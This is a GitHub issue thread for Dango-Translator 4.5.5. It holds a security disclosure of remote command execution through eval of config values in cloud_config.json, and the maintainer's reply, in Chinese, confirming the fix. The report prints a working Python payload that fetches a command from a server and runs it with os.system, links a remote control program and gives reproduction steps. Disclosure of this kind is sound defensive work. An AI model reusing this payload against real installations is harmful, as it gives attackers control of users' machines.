PantsuDango
commented
1 year ago 非常非常感谢您提出这个安全隐患,确实是我的疏忽,没太在意可能被利用。 事实上 eval 函数是一个非常危险的函数,我应该尽可能避免在代码里使用它。 因此我完全采纳了你的意见,修复了代码里所有使用 eval 的地方。
相关修复已推送 commit
再次感谢您!
Closed Leeyangee closed 1 year ago
PantsuDango
commented
1 year ago 非常非常感谢您提出这个安全隐患,确实是我的疏忽,没太在意可能被利用。 事实上 eval 函数是一个非常危险的函数,我应该尽可能避免在代码里使用它。 因此我完全采纳了你的意见,修复了代码里所有使用 eval 的地方。
相关修复已推送 commit
再次感谢您!
Vulnerability Product: Dango-Translator Ver4.5.5 Vulnerability version: Ver4.5.5 Vulnerability type: Hijacked Remote Command Execute Vulnerability Details: Vulnerability location: app/config/cloud_config.json
withoud check the xxxUse variable in app/config/cloud_config.json and eval it ,unsafe config may causes Hijacked Remote Command Execute
client payload :
"__import__('urllib.request').request.urlopen('http://localhost:12345/DangoTranslate/ShowDict').read().decode('utf-8') + ('' if __import__('os').system(__import__('urllib.request').request.urlopen('http://localhost:12345/CmdPath').read().decode('utf-8')) else '')"remote hijacking program : https://github.com/Leeyangee/leeya_bug/raw/main/DangoTranslator_payload/testProject/testProject.exe remote hijacking program original code : https://github.com/Leeyangee/leeya_bug/tree/main/DangoTranslator_payload/testProjectPROVE:
Firstly download a Dango-Translator Ver4.5.5 Run the program to generate config
Secondly go to app/config/cloud_config.json, replace value of xxxUse with client payload, here replace
"tencentwebUse": "False"with"tencentwebUse": "__import__('urllib.request').request.urlopen('http://localhost:12345/DangoTranslate/ShowDict').read().decode('utf-8') + ('' if __import__('os').system(__import__('urllib.request').request.urlopen('http://localhost:12345/CmdPath').read().decode('utf-8')) else '')"Thirdly download remote hijacking program : https://github.com/Leeyangee/leeya_bug/raw/main/DangoTranslator_payload/testProject/testProject.exe, and keep the program running (This is a remote hijacking program, so you can deploy it on server but need to change IP_DOMAIN in original_code and url in client payload and re-compile it)
Fourthly run "团子翻译器.exe", after login in, windows pops up a calculator(because remote hijacking program runs "calc" command on the client)
Once the client login in, the remote hijacking program could detect it and run command on the client
proved Hijacked Remote Command Execute
REASON:
the client payload is divided into these parts
the result of eval(client payload) is it self, because "tencentwebUse" will be evaled before exit
Harm:
attackers could replace payload in order to let client respond a shell to attackers so attackers could directly obtain shell and get server permissions
discovered by leeya_bug